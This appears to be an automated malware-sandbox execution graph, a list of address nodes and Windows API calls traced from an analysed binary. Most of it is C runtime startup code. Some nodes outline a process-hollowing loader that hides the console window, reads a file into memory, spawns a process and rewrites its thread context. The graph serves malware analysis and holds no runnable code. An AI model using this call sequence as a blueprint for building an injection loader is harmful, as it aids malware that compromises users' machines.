                                                  execution_graph 12032 41274c 12033 412765 12032->12033 12034 412783 12032->12034 12033->12034 12035 4117a7 2 API calls 12033->12035 12035->12033 10867 b80227 10878 b80005 GetPEB 10867->10878 10869 b802b8 10870 b8044d 10869->10870 10871 b80469 CreateFileW 10869->10871 10871->10870 10872 b80493 VirtualAlloc ReadFile 10871->10872 10872->10870 10875 b804cb 10872->10875 10874 b804e4 10875->10874 10877 b80917 ExitProcess 10875->10877 10879 b8091e 10875->10879 10878->10869 10880 b80934 10879->10880 10895 b80005 GetPEB 10880->10895 10882 b809ad 10883 b80ac7 10882->10883 10884 b80af2 CreateProcessW 10882->10884 10888 b80b01 10882->10888 10890 b80faf 11 API calls 10882->10890 10892 b80d8e SetThreadContext 10882->10892 10894 b811f6 11 API calls 10882->10894 10896 b80e97 10882->10896 10905 b81289 10882->10905 10914 b81147 10882->10914 10883->10875 10885 b80b06 GetThreadContext 10884->10885 10884->10888 10886 b80b29 ReadProcessMemory 10885->10886 10885->10888 10886->10882 10886->10888 10888->10883 10923 b811f6 10888->10923 10890->10882 10892->10882 10892->10888 10894->10882 10895->10882 10897 b80eb2 10896->10897 10932 b8007a GetPEB 10897->10932 10899 b80ed3 10900 b80f8b 10899->10900 10901 b80edb 10899->10901 10949 b816cc 10900->10949 10934 b814be 10901->10934 10904 b80f72 10904->10882 10906 b812a4 10905->10906 10907 b8007a GetPEB 10906->10907 10908 b812c5 10907->10908 10909 b812cd 10908->10909 10910 b81357 10908->10910 10911 b814be 10 API calls 10909->10911 10959 b81714 10910->10959 10913 b8133e 10911->10913 10913->10882 10915 b81162 10914->10915 10916 b8007a GetPEB 10915->10916 10917 b81183 10916->10917 10918 b811cd 10917->10918 10919 b81187 10917->10919 10962 b816f0 10918->10962 10920 b814be 10 API calls 10919->10920 10922 b811c2 10920->10922 10922->10882 10924 b81209 10923->10924 10925 b8007a GetPEB 10924->10925 10926 b8122a 10925->10926 10927 b8122e 10926->10927 10928 b81274 10926->10928 10930 b814be 10 API calls 10927->10930 10965 b81702 10928->10965 10931 b81269 10930->10931 10931->10883 10933 b8009c 10932->10933 10933->10899 10952 b80005 GetPEB 10934->10952 10936 b8150a 10953 b80019 GetPEB 10936->10953 10939 b81597 10940 b815a8 VirtualAlloc 10939->10940 10943 b8166c 10939->10943 10941 b815be ReadFile 10940->10941 10940->10943 10942 b815d3 VirtualAlloc 10941->10942 10941->10943 10942->10943 10946 b815f6 10942->10946 10944 b816b1 10943->10944 10945 b816a6 VirtualFree 10943->10945 10944->10904 10945->10944 10946->10943 10947 b8165b FindCloseChangeNotification 10946->10947 10948 b8165f VirtualFree 10946->10948 10947->10948 10948->10943 10950 b814be 10 API calls 10949->10950 10951 b816d6 10950->10951 10951->10904 10952->10936 10954 b8002c 10953->10954 10956 b80041 CreateFileW 10954->10956 10957 b80149 GetPEB 10954->10957 10956->10939 10956->10943 10958 b8016f 10957->10958 10958->10954 10960 b814be 10 API calls 10959->10960 10961 b8171e 10960->10961 10961->10913 10963 b814be 10 API calls 10962->10963 10964 b816fa 10963->10964 10964->10922 10966 b814be 10 API calls 10965->10966 10967 b8170c 10966->10967 10967->10931 9527 40a519 9532 40ab9e SetUnhandledExceptionFilter 9527->9532 9529 40a51e pre_c_initialization 9533 40f03d 9529->9533 9531 40a529 9532->9529 9534 40f063 9533->9534 9535 40f049 9533->9535 9534->9531 9535->9534 9540 40f9f9 9535->9540 9546 40fea1 GetLastError 9540->9546 9542 40f053 9543 40f93c 9542->9543 9766 40f8d8 9543->9766 9545 40f05e 9545->9531 9547 40febe 9546->9547 9548 40feb8 9546->9548 9567 40fec4 SetLastError 9547->9567 9574 412551 9547->9574 9569 412512 9548->9569 9555 40fef4 9558 412551 pre_c_initialization 6 API calls 9555->9558 9556 40ff0b 9557 412551 pre_c_initialization 6 API calls 9556->9557 9559 40ff17 9557->9559 9560 40ff02 9558->9560 9561 40ff1b 9559->9561 9562 40ff2c 9559->9562 9586 40f5c1 9560->9586 9563 412551 pre_c_initialization 6 API calls 9561->9563 9592 40fb78 9562->9592 9563->9560 9567->9542 9568 40f5c1 ___vcrt_freefls@4 12 API calls 9568->9567 9597 412374 9569->9597 9571 41252e 9572 412537 9571->9572 9573 412549 TlsGetValue 9571->9573 9572->9547 9575 412374 pre_c_initialization 5 API calls 9574->9575 9576 41256d 9575->9576 9577 40fedc 9576->9577 9578 41258b TlsSetValue 9576->9578 9577->9567 9579 40f68d 9577->9579 9585 40f69a pre_c_initialization 9579->9585 9580 40f6da 9582 40f9f9 __dosmaperr 13 API calls 9580->9582 9581 40f6c5 HeapAlloc 9583 40f6d8 9581->9583 9581->9585 9582->9583 9583->9555 9583->9556 9585->9580 9585->9581 9610 4127fd 9585->9610 9587 40f5cc HeapFree 9586->9587 9591 40f5f5 __dosmaperr 9586->9591 9588 40f5e1 9587->9588 9587->9591 9589 40f9f9 __dosmaperr 12 API calls 9588->9589 9590 40f5e7 GetLastError 9589->9590 9590->9591 9591->9567 9624 40fa0c 9592->9624 9598 4123a2 9597->9598 9599 41239e __crt_fast_encode_pointer 9597->9599 9598->9599 9603 4122ad 9598->9603 9599->9571 9602 4123bc GetProcAddress 9602->9599 9608 4122be pre_c_initialization 9603->9608 9604 412369 9604->9599 9604->9602 9605 4122dc LoadLibraryExW 9606 4122f7 GetLastError 9605->9606 9605->9608 9606->9608 9607 412352 FreeLibrary 9607->9608 9608->9604 9608->9605 9608->9607 9609 41232a LoadLibraryExW 9608->9609 9609->9608 9613 41282a 9610->9613 9614 412836 ___scrt_is_nonwritable_in_current_image 9613->9614 9619 4113bc EnterCriticalSection 9614->9619 9616 412841 9620 41287d 9616->9620 9619->9616 9623 411404 LeaveCriticalSection 9620->9623 9622 412808 9622->9585 9623->9622 9625 40fa18 ___scrt_is_nonwritable_in_current_image 9624->9625 9638 4113bc EnterCriticalSection 9625->9638 9627 40fa22 9639 40fa52 9627->9639 9630 40fb1e 9631 40fb2a ___scrt_is_nonwritable_in_current_image 9630->9631 9643 4113bc EnterCriticalSection 9631->9643 9633 40fb34 9644 40fcff 9633->9644 9635 40fb4c 9648 40fb6c 9635->9648 9638->9627 9642 411404 LeaveCriticalSection 9639->9642 9641 40fa40 9641->9630 9642->9641 9643->9633 9645 40fd0e __fassign 9644->9645 9647 40fd35 __fassign 9644->9647 9645->9647 9651 411f42 9645->9651 9647->9635 9765 411404 LeaveCriticalSection 9648->9765 9650 40fb5a 9650->9568 9653 411fc2 9651->9653 9656 411f58 9651->9656 9654 40f5c1 ___vcrt_freefls@4 14 API calls 9653->9654 9678 412010 9653->9678 9655 411fe4 9654->9655 9659 40f5c1 ___vcrt_freefls@4 14 API calls 9655->9659 9656->9653 9657 411f8b 9656->9657 9661 40f5c1 ___vcrt_freefls@4 14 API calls 9656->9661 9658 411fad 9657->9658 9667 40f5c1 ___vcrt_freefls@4 14 API calls 9657->9667 9660 40f5c1 ___vcrt_freefls@4 14 API calls 9658->9660 9662 411ff7 9659->9662 9663 411fb7 9660->9663 9665 411f80 9661->9665 9668 40f5c1 ___vcrt_freefls@4 14 API calls 9662->9668 9671 40f5c1 ___vcrt_freefls@4 14 API calls 9663->9671 9664 41207e 9672 40f5c1 ___vcrt_freefls@4 14 API calls 9664->9672 9679 4118e7 9665->9679 9666 41201e 9666->9664 9676 40f5c1 14 API calls ___vcrt_freefls@4 9666->9676 9669 411fa2 9667->9669 9670 412005 9668->9670 9707 4119e5 9669->9707 9675 40f5c1 ___vcrt_freefls@4 14 API calls 9670->9675 9671->9653 9677 412084 9672->9677 9675->9678 9676->9666 9677->9647 9719 4120b3 9678->9719 9680 4118f8 9679->9680 9706 4119e1 9679->9706 9681 411909 9680->9681 9682 40f5c1 ___vcrt_freefls@4 14 API calls 9680->9682 9683 41191b 9681->9683 9684 40f5c1 ___vcrt_freefls@4 14 API calls 9681->9684 9682->9681 9685 41192d 9683->9685 9686 40f5c1 ___vcrt_freefls@4 14 API calls 9683->9686 9684->9683 9687 41193f 9685->9687 9688 40f5c1 ___vcrt_freefls@4 14 API calls 9685->9688 9686->9685 9689 411951 9687->9689 9690 40f5c1 ___vcrt_freefls@4 14 API calls 9687->9690 9688->9687 9691 411963 9689->9691 9692 40f5c1 ___vcrt_freefls@4 14 API calls 9689->9692 9690->9689 9693 411975 9691->9693 9694 40f5c1 ___vcrt_freefls@4 14 API calls 9691->9694 9692->9691 9695 411987 9693->9695 9696 40f5c1 ___vcrt_freefls@4 14 API calls 9693->9696 9694->9693 9697 411999 9695->9697 9698 40f5c1 ___vcrt_freefls@4 14 API calls 9695->9698 9696->9695 9699 4119ab 9697->9699 9700 40f5c1 ___vcrt_freefls@4 14 API calls 9697->9700 9698->9697 9701 4119bd 9699->9701 9702 40f5c1 ___vcrt_freefls@4 14 API calls 9699->9702 9700->9699 9703 4119cf 9701->9703 9704 40f5c1 ___vcrt_freefls@4 14 API calls 9701->9704 9702->9701 9705 40f5c1 ___vcrt_freefls@4 14 API calls 9703->9705 9703->9706 9704->9703 9705->9706 9706->9657 9708 4119f2 9707->9708 9718 411a4a 9707->9718 9709 411a02 9708->9709 9710 40f5c1 ___vcrt_freefls@4 14 API calls 9708->9710 9711 411a14 9709->9711 9712 40f5c1 ___vcrt_freefls@4 14 API calls 9709->9712 9710->9709 9713 411a26 9711->9713 9714 40f5c1 ___vcrt_freefls@4 14 API calls 9711->9714 9712->9711 9715 40f5c1 ___vcrt_freefls@4 14 API calls 9713->9715 9716 411a38 9713->9716 9714->9713 9715->9716 9717 40f5c1 ___vcrt_freefls@4 14 API calls 9716->9717 9716->9718 9717->9718 9718->9658 9720 4120c0 9719->9720 9724 4120df 9719->9724 9720->9724 9725 411a86 9720->9725 9723 40f5c1 ___vcrt_freefls@4 14 API calls 9723->9724 9724->9666 9726 411b64 9725->9726 9727 411a97 9725->9727 9726->9723 9761 411a4e 9727->9761 9730 411a4e __fassign 14 API calls 9731 411aaa 9730->9731 9732 411a4e __fassign 14 API calls 9731->9732 9733 411ab5 9732->9733 9734 411a4e __fassign 14 API calls 9733->9734 9735 411ac0 9734->9735 9736 411a4e __fassign 14 API calls 9735->9736 9737 411ace 9736->9737 9738 40f5c1 ___vcrt_freefls@4 14 API calls 9737->9738 9739 411ad9 9738->9739 9740 40f5c1 ___vcrt_freefls@4 14 API calls 9739->9740 9741 411ae4 9740->9741 9742 40f5c1 ___vcrt_freefls@4 14 API calls 9741->9742 9743 411aef 9742->9743 9744 411a4e __fassign 14 API calls 9743->9744 9745 411afd 9744->9745 9746 411a4e __fassign 14 API calls 9745->9746 9747 411b0b 9746->9747 9748 411a4e __fassign 14 API calls 9747->9748 9749 411b1c 9748->9749 9750 411a4e __fassign 14 API calls 9749->9750 9751 411b2a 9750->9751 9752 411a4e __fassign 14 API calls 9751->9752 9753 411b38 9752->9753 9754 40f5c1 ___vcrt_freefls@4 14 API calls 9753->9754 9755 411b43 9754->9755 9756 40f5c1 ___vcrt_freefls@4 14 API calls 9755->9756 9757 411b4e 9756->9757 9758 40f5c1 ___vcrt_freefls@4 14 API calls 9757->9758 9759 411b59 9758->9759 9760 40f5c1 ___vcrt_freefls@4 14 API calls 9759->9760 9760->9726 9762 411a81 9761->9762 9763 411a71 9761->9763 9762->9730 9763->9762 9764 40f5c1 ___vcrt_freefls@4 14 API calls 9763->9764 9764->9763 9765->9650 9767 40fea1 __dosmaperr 14 API calls 9766->9767 9768 40f8e3 9767->9768 9769 40f8f1 9768->9769 9774 40f94c IsProcessorFeaturePresent 9768->9774 9769->9545 9771 40f93b 9772 40f8d8 pre_c_initialization 25 API calls 9771->9772 9773 40f948 9772->9773 9773->9545 9775 40f958 9774->9775 9778 40f790 9775->9778 9779 40f7ac pre_c_initialization ___scrt_fastfail 9778->9779 9780 40f7d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9779->9780 9783 40f8a9 pre_c_initialization 9780->9783 9782 40f8c7 GetCurrentProcess TerminateProcess 9782->9771 9784 40ae5b 9783->9784 9785 40ae64 9784->9785 9786 40ae66 IsProcessorFeaturePresent 9784->9786 9785->9782 9788 40aea8 9786->9788 9791 40ae6c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9788->9791 9790 40af8b 9790->9782 9791->9790 9792 40a52b 9793 40a537 ___scrt_is_nonwritable_in_current_image 9792->9793 9813 40a739 9793->9813 9796 40a53e 9799 40a567 pre_c_initialization ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 9796->9799 9868 40aa3f IsProcessorFeaturePresent 9796->9868 9797 40a586 ___scrt_is_nonwritable_in_current_image 9798 40a606 9824 40eb4e 9798->9824 9799->9797 9799->9798 9872 40ee93 9799->9872 9807 40a637 9809 40a640 9807->9809 9883 40ee6e 9807->9883 9886 40a8b0 9809->9886 9814 40a742 9813->9814 9892 40acab IsProcessorFeaturePresent 9814->9892 9818 40a753 9819 40a757 9818->9819 9903 40f4e4 9818->9903 9819->9796 9822 40a76e 9822->9796 9825 40a61a 9824->9825 9826 40eb57 9824->9826 9828 409720 GetConsoleWindow ShowWindow 9825->9828 9982 40e880 9826->9982 10053 40dc06 9828->10053 9830 409779 ___scrt_fastfail 9831 40979c CreateFileW GetFileSize VirtualAlloc ReadFile 9830->9831 9867 409785 9830->9867 9832 409809 EnumSystemCodePagesW 9831->9832 10060 40dbeb 9832->10060 9837 409a24 9838 409ed0 9837->9838 9854 409adb 9837->9854 9837->9867 9838->9867 10067 402960 9838->10067 9840 409f11 9841 409f97 9840->9841 9842 409f2f GetStdHandle GetStdHandle 9840->9842 9840->9867 10085 4046f0 GetACP TranslateCharsetInfo 9841->10085 9844 409f52 9842->9844 9846 409f86 9844->9846 10073 404690 9844->10073 9846->9867 10116 404ca0 9846->10116 9848 409f7c 9848->9867 9849 409faf GetStartupInfoW 9851 409fd1 9849->9851 9851->9851 10098 406640 9851->10098 9852 409f6e 10081 4034e0 9852->10081 9860 409c0f 9854->9860 9854->9867 10063 40e35e 9854->10063 9862 40e35e 38 API calls 9860->9862 9863 409cf1 9860->9863 9860->9867 9862->9863 9864 40e35e 38 API calls 9863->9864 9865 409dd3 9863->9865 9863->9867 9864->9865 9866 40e35e 38 API calls 9865->9866 9865->9867 9866->9867 9878 40ab5a GetModuleHandleW 9867->9878 9869 40aa55 ___scrt_fastfail 9868->9869 9870 40aafd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9869->9870 9871 40ab47 9870->9871 9871->9796 9873 40eea9 pre_c_initialization ___scrt_is_nonwritable_in_current_image 9872->9873 9873->9798 9874 40fd4a pre_c_initialization 37 API calls 9873->9874 9877 40f596 9874->9877 9875 40f649 pre_c_initialization 37 API calls 9876 40f5c0 9875->9876 9877->9875 9879 40a62d 9878->9879 9879->9807 9880 40eeb9 9879->9880 9881 40ed14 pre_c_initialization 23 API calls 9880->9881 9882 40eeca 9881->9882 9882->9807 9884 40ed14 pre_c_initialization 23 API calls 9883->9884 9885 40ee79 9884->9885 9885->9809 9887 40a8bc 9886->9887 9888 40a649 9887->9888 10691 40f4f6 9887->10691 9888->9797 9890 40a8ca 9891 40d53f ___vcrt_uninitialize 8 API calls 9890->9891 9891->9888 9893 40a74e 9892->9893 9894 40d516 9893->9894 9895 40d51b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 9894->9895 9914 40d729 9895->9914 9898 40d529 9898->9818 9900 40d531 9901 40d53c 9900->9901 9928 40d765 9900->9928 9901->9818 9969 412755 9903->9969 9906 40d53f 9907 40d548 9906->9907 9908 40d559 9906->9908 9909 40d70e ___vcrt_uninitialize_ptd 6 API calls 9907->9909 9908->9819 9910 40d54d 9909->9910 9911 40d765 ___vcrt_uninitialize_locks DeleteCriticalSection 9910->9911 9912 40d552 9911->9912 9978 40d9e6 9912->9978 9915 40d732 9914->9915 9917 40d75b 9915->9917 9918 40d525 9915->9918 9932 40d966 9915->9932 9919 40d765 ___vcrt_uninitialize_locks DeleteCriticalSection 9917->9919 9918->9898 9920 40d6db 9918->9920 9919->9918 9950 40d8b5 9920->9950 9922 40d6e5 9927 40d6f0 9922->9927 9955 40d929 9922->9955 9924 40d6fe 9925 40d70b 9924->9925 9960 40d70e 9924->9960 9925->9900 9927->9900 9929 40d78f 9928->9929 9930 40d770 9928->9930 9929->9898 9931 40d77a DeleteCriticalSection 9930->9931 9931->9929 9931->9931 9937 40d794 9932->9937 9934 40d980 9935 40d99d InitializeCriticalSectionAndSpinCount 9934->9935 9936 40d989 9934->9936 9935->9936 9936->9915 9941 40d7c4 9937->9941 9942 40d7c8 __crt_fast_encode_pointer 9937->9942 9938 40d7e8 9940 40d7f4 GetProcAddress 9938->9940 9938->9942 9940->9942 9941->9938 9941->9942 9943 40d834 9941->9943 9942->9934 9944 40d85c LoadLibraryExW 9943->9944 9949 40d851 9943->9949 9945 40d878 GetLastError 9944->9945 9946 40d890 9944->9946 9945->9946 9947 40d883 LoadLibraryExW 9945->9947 9948 40d8a7 FreeLibrary 9946->9948 9946->9949 9947->9946 9948->9949 9949->9941 9951 40d794 try_get_function 5 API calls 9950->9951 9952 40d8cf 9951->9952 9953 40d8e7 TlsAlloc 9952->9953 9954 40d8d8 9952->9954 9954->9922 9956 40d794 try_get_function 5 API calls 9955->9956 9957 40d943 9956->9957 9958 40d95d TlsSetValue 9957->9958 9959 40d952 9957->9959 9958->9959 9959->9924 9961 40d71e 9960->9961 9962 40d718 9960->9962 9961->9927 9964 40d8ef 9962->9964 9965 40d794 try_get_function 5 API calls 9964->9965 9966 40d909 9965->9966 9967 40d920 TlsFree 9966->9967 9968 40d915 9966->9968 9967->9968 9968->9961 9970 412765 9969->9970 9971 40a760 9969->9971 9970->9971 9973 4117a7 9970->9973 9971->9822 9971->9906 9976 4117ae 9973->9976 9974 4117f1 GetStdHandle 9974->9976 9975 411857 9975->9970 9976->9974 9976->9975 9977 411804 GetFileType 9976->9977 9977->9976 9979 40d9ef 9978->9979 9981 40da15 9978->9981 9980 40d9ff FreeLibrary 9979->9980 9979->9981 9980->9979 9981->9908 9983 40e889 9982->9983 9986 40e89f 9982->9986 9983->9986 9988 40e8ac 9983->9988 9985 40e896 9985->9986 9999 40ea36 9985->9999 9986->9825 9989 40e8b5 9988->9989 9990 40e8b8 9988->9990 9989->9985 10007 410f9d GetEnvironmentStringsW 9990->10007 9993 40e8c5 9996 40f5c1 ___vcrt_freefls@4 14 API calls 9993->9996 9997 40e8f4 9996->9997 9997->9985 9998 40f5c1 ___vcrt_freefls@4 14 API calls 9998->9993 10000 40eaa1 9999->10000 10005 40ea45 9999->10005 10000->9986 10001 410e33 MultiByteToWideChar __fassign 10001->10005 10002 40f68d pre_c_initialization 14 API calls 10002->10005 10003 40eaa5 10004 40f5c1 ___vcrt_freefls@4 14 API calls 10003->10004 10004->10000 10005->10000 10005->10001 10005->10002 10005->10003 10006 40f5c1 ___vcrt_freefls@4 14 API calls 10005->10006 10006->10005 10008 40e8bf 10007->10008 10009 410fb1 10007->10009 10008->9993 10014 40e8fa 10008->10014 10031 40f5fb 10009->10031 10011 410fc5 ___scrt_uninitialize_crt 10012 40f5c1 ___vcrt_freefls@4 14 API calls 10011->10012 10013 410fdf FreeEnvironmentStringsW 10012->10013 10013->10008 10016 40e919 10014->10016 10015 40f68d pre_c_initialization 14 API calls 10019 40e957 10015->10019 10016->10015 10016->10016 10017 40f5c1 ___vcrt_freefls@4 14 API calls 10018 40e8d0 10017->10018 10018->9998 10019->10019 10020 40f68d pre_c_initialization 14 API calls 10019->10020 10021 40e9da 10019->10021 10025 40e9fa 10019->10025 10028 40f5c1 ___vcrt_freefls@4 14 API calls 10019->10028 10029 40e9d8 10019->10029 10038 40fff6 10019->10038 10020->10019 10047 40ea07 10021->10047 10027 40f94c pre_c_initialization 11 API calls 10025->10027 10026 40f5c1 ___vcrt_freefls@4 14 API calls 10026->10029 10030 40ea06 10027->10030 10028->10019 10029->10017 10032 40f639 10031->10032 10037 40f609 pre_c_initialization 10031->10037 10033 40f9f9 __dosmaperr 14 API calls 10032->10033 10035 40f637 10033->10035 10034 40f624 RtlAllocateHeap 10034->10035 10034->10037 10035->10011 10036 4127fd pre_c_initialization 2 API calls 10036->10037 10037->10032 10037->10034 10037->10036 10039 410003 10038->10039 10042 410011 10038->10042 10039->10042 10045 41002a 10039->10045 10040 40f9f9 __dosmaperr 14 API calls 10041 41001b 10040->10041 10043 40f93c pre_c_initialization 25 API calls 10041->10043 10042->10040 10044 410025 10043->10044 10044->10019 10045->10044 10046 40f9f9 __dosmaperr 14 API calls 10045->10046 10046->10041 10051 40e9e0 10047->10051 10052 40ea14 10047->10052 10048 40ea2b 10050 40f5c1 ___vcrt_freefls@4 14 API calls 10048->10050 10049 40f5c1 ___vcrt_freefls@4 14 API calls 10049->10052 10050->10051 10051->10026 10052->10048 10052->10049 10059 40f5fb pre_c_initialization 10053->10059 10054 40f639 10055 40f9f9 __dosmaperr 14 API calls 10054->10055 10057 40f637 10055->10057 10056 40f624 RtlAllocateHeap 10056->10057 10056->10059 10057->9830 10058 4127fd pre_c_initialization 2 API calls 10058->10059 10059->10054 10059->10056 10059->10058 10061 40f5c1 ___vcrt_freefls@4 14 API calls 10060->10061 10062 4099cc GetOEMCP 10061->10062 10062->9837 10064 40e379 10063->10064 10129 40dc68 10064->10129 10068 402970 10067->10068 10069 40dc06 15 API calls 10068->10069 10071 40297c ___scrt_uninitialize_crt 10068->10071 10070 402a88 10069->10070 10070->10071 10072 40dbeb 14 API calls 10070->10072 10071->9840 10072->10071 10074 4046d0 10073->10074 10075 40469c 10073->10075 10074->9846 10074->9852 10359 4074c0 10075->10359 10077 4046ac 10366 4069a0 10077->10366 10080 4074c0 4 API calls 10080->10074 10082 4034f7 10081->10082 10083 4034f0 10081->10083 10082->10083 10084 403503 CreateThread 10082->10084 10083->9846 10083->9848 10084->10083 10086 404720 10085->10086 10087 404727 GetStartupInfoW 10085->10087 10086->9848 10086->9849 10088 404750 10087->10088 10097 404792 10087->10097 10091 40dc06 15 API calls 10088->10091 10090 40483a 6 API calls 10090->10086 10093 404904 10090->10093 10091->10097 10094 404928 10093->10094 10383 406790 10093->10383 10389 401cb0 10094->10389 10097->10086 10380 404b80 10097->10380 10099 406653 10098->10099 10102 40665f ___scrt_uninitialize_crt 10098->10102 10100 40dc06 15 API calls 10099->10100 10100->10102 10101 40dbeb 14 API calls 10103 4066a6 10101->10103 10102->10101 10105 40666b ShowWindow 10102->10105 10104 40675f 10103->10104 10106 4074c0 4 API calls 10103->10106 10104->10105 10107 40676b SetWindowTextW 10104->10107 10105->9846 10108 4066d5 10106->10108 10107->10105 10109 4066f8 WideCharToMultiByte 10108->10109 10111 40670f 10109->10111 10110 406746 10112 4074c0 4 API calls 10110->10112 10111->10110 10113 40673f WideCharToMultiByte 10111->10113 10114 406756 10112->10114 10113->10110 10115 407430 4 API calls 10114->10115 10115->10104 10117 404cdb 10116->10117 10118 404cba CreateEventW 10116->10118 10128 404cd1 10117->10128 10683 401ad0 10117->10683 10118->10117 10118->10128 10120 404da9 WaitForMultipleObjects 10122 404d20 10120->10122 10121 404d8d MsgWaitForMultipleObjects 10121->10122 10122->10120 10122->10121 10123 404dc6 PeekMessageW 10122->10123 10124 404e0b EnterCriticalSection 10122->10124 10126 404de9 DispatchMessageW 10122->10126 10122->10128 10123->10122 10687 4056e0 10124->10687 10126->10123 10128->9867 10147 40e321 10129->10147 10131 40dcb6 10154 40e270 10131->10154 10133 40dc92 10135 40f9f9 __dosmaperr 14 API calls 10133->10135 10134 40dc7d 10134->10131 10134->10133 10146 40dca2 10134->10146 10136 40dc97 10135->10136 10137 40f93c pre_c_initialization 25 API calls 10136->10137 10137->10146 10139 40dcc5 10140 40dcef 10139->10140 10162 40db77 10139->10162 10141 40dfc7 10140->10141 10166 40e2f3 10140->10166 10142 40e2f3 25 API calls 10141->10142 10144 40e1fd 10142->10144 10145 40f9f9 __dosmaperr 14 API calls 10144->10145 10144->10146 10145->10146 10146->9860 10148 40e326 10147->10148 10149 40e339 10147->10149 10150 40f9f9 __dosmaperr 14 API calls 10148->10150 10149->10134 10151 40e32b 10150->10151 10152 40f93c pre_c_initialization 25 API calls 10151->10152 10153 40e336 10152->10153 10153->10134 10155 40e290 10154->10155 10156 40e287 10154->10156 10155->10156 10172 40fd4a GetLastError 10155->10172 10156->10139 10163 40db94 10162->10163 10164 40db9e 10162->10164 10163->10164 10358 40f6ea GetStringTypeW 10163->10358 10164->10139 10167 40e308 10166->10167 10168 40e31d 10166->10168 10167->10168 10169 40f9f9 __dosmaperr 14 API calls 10167->10169 10168->10141 10170 40e312 10169->10170 10171 40f93c pre_c_initialization 25 API calls 10170->10171 10171->10168 10173 40fd61 10172->10173 10174 40fd67 10172->10174 10175 412512 pre_c_initialization 6 API calls 10173->10175 10176 412551 pre_c_initialization 6 API calls 10174->10176 10196 40fd6d SetLastError 10174->10196 10175->10174 10177 40fd85 10176->10177 10178 40f68d pre_c_initialization 14 API calls 10177->10178 10177->10196 10180 40fd95 10178->10180 10181 40fdb4 10180->10181 10182 40fd9d 10180->10182 10186 412551 pre_c_initialization 6 API calls 10181->10186 10187 412551 pre_c_initialization 6 API calls 10182->10187 10183 40fe01 10207 40f649 10183->10207 10184 40e2b0 10199 40ff9c 10184->10199 10189 40fdc0 10186->10189 10190 40fdab 10187->10190 10191 40fdc4 10189->10191 10192 40fdd5 10189->10192 10193 40f5c1 ___vcrt_freefls@4 14 API calls 10190->10193 10194 412551 pre_c_initialization 6 API calls 10191->10194 10195 40fb78 pre_c_initialization 14 API calls 10192->10195 10193->10196 10194->10190 10197 40fde0 10195->10197 10196->10183 10196->10184 10198 40f5c1 ___vcrt_freefls@4 14 API calls 10197->10198 10198->10196 10200 40ffaf 10199->10200 10202 40e2c6 10199->10202 10200->10202 10315 41218e 10200->10315 10203 40ffc9 10202->10203 10204 40fff1 10203->10204 10205 40ffdc 10203->10205 10204->10156 10205->10204 10337 410bac 10205->10337 10218 412954 10207->10218 10211 40f663 IsProcessorFeaturePresent 10213 40f66f 10211->10213 10212 40f659 10212->10211 10217 40f682 10212->10217 10215 40f790 pre_c_initialization 8 API calls 10213->10215 10215->10217 10248 40ee7d 10217->10248 10251 412886 10218->10251 10221 412999 10222 4129a5 ___scrt_is_nonwritable_in_current_image 10221->10222 10223 4129cc pre_c_initialization 10222->10223 10224 40fea1 __dosmaperr 14 API calls 10222->10224 10225 4129d2 pre_c_initialization 10222->10225 10223->10225 10226 412a19 10223->10226 10239 412a03 10223->10239 10224->10223 10231 412a45 10225->10231 10262 4113bc EnterCriticalSection 10225->10262 10227 40f9f9 __dosmaperr 14 API calls 10226->10227 10228 412a1e 10227->10228 10229 40f93c pre_c_initialization 25 API calls 10228->10229 10229->10239 10233 412a87 10231->10233 10234 412b78 10231->10234 10245 412ab6 10231->10245 10241 40fd4a pre_c_initialization 37 API calls 10233->10241 10233->10245 10236 412b83 10234->10236 10267 411404 LeaveCriticalSection 10234->10267 10238 40ee7d pre_c_initialization 23 API calls 10236->10238 10240 412b8b 10238->10240 10239->10212 10243 412aab 10241->10243 10242 40fd4a pre_c_initialization 37 API calls 10246 412b0b 10242->10246 10244 40fd4a pre_c_initialization 37 API calls 10243->10244 10244->10245 10263 412b25 10245->10263 10246->10239 10247 40fd4a pre_c_initialization 37 API calls 10246->10247 10247->10239 10269 40ed14 10248->10269 10252 412892 ___scrt_is_nonwritable_in_current_image 10251->10252 10257 4113bc EnterCriticalSection 10252->10257 10254 4128a0 10258 4128de 10254->10258 10257->10254 10261 411404 LeaveCriticalSection 10258->10261 10260 40f64e 10260->10212 10260->10221 10261->10260 10262->10231 10264 412afc 10263->10264 10265 412b2b 10263->10265 10264->10239 10264->10242 10264->10246 10268 411404 LeaveCriticalSection 10265->10268 10267->10236 10268->10264 10270 40ed22 10269->10270 10271 40ed33 10269->10271 10280 40edba GetModuleHandleW 10270->10280 10287 40ebda 10271->10287 10276 40ed6d 10281 40ed27 10280->10281 10281->10271 10282 40edfd GetModuleHandleExW 10281->10282 10283 40ee1c GetProcAddress 10282->10283 10284 40ee31 10282->10284 10283->10284 10285 40ee45 FreeLibrary 10284->10285 10286 40ee4e 10284->10286 10285->10286 10286->10271 10288 40ebe6 ___scrt_is_nonwritable_in_current_image 10287->10288 10303 4113bc EnterCriticalSection 10288->10303 10290 40ebf0 10304 40ec27 10290->10304 10292 40ebfd 10308 40ec1b 10292->10308 10295 40ed78 10311 41141b GetPEB 10295->10311 10298 40eda7 10301 40edfd pre_c_initialization 3 API calls 10298->10301 10299 40ed87 GetPEB 10299->10298 10300 40ed97 GetCurrentProcess TerminateProcess 10299->10300 10300->10298 10302 40edaf ExitProcess 10301->10302 10303->10290 10305 40ec33 ___scrt_is_nonwritable_in_current_image 10304->10305 10306 40f360 pre_c_initialization 14 API calls 10305->10306 10307 40ec94 pre_c_initialization 10305->10307 10306->10307 10307->10292 10309 411404 __onexit LeaveCriticalSection 10308->10309 10310 40ec09 10309->10310 10310->10276 10310->10295 10312 411435 10311->10312 10313 40ed82 10311->10313 10314 4123f7 pre_c_initialization 5 API calls 10312->10314 10313->10298 10313->10299 10314->10313 10316 41219a ___scrt_is_nonwritable_in_current_image 10315->10316 10317 40fd4a pre_c_initialization 37 API calls 10316->10317 10318 4121a3 10317->10318 10319 4121e9 10318->10319 10328 4113bc EnterCriticalSection 10318->10328 10319->10202 10321 4121c1 10329 41220f 10321->10329 10326 40f649 pre_c_initialization 37 API calls 10327 41220e 10326->10327 10328->10321 10330 41221d __fassign 10329->10330 10332 4121d2 10329->10332 10331 411f42 __fassign 14 API calls 10330->10331 10330->10332 10331->10332 10333 4121ee 10332->10333 10336 411404 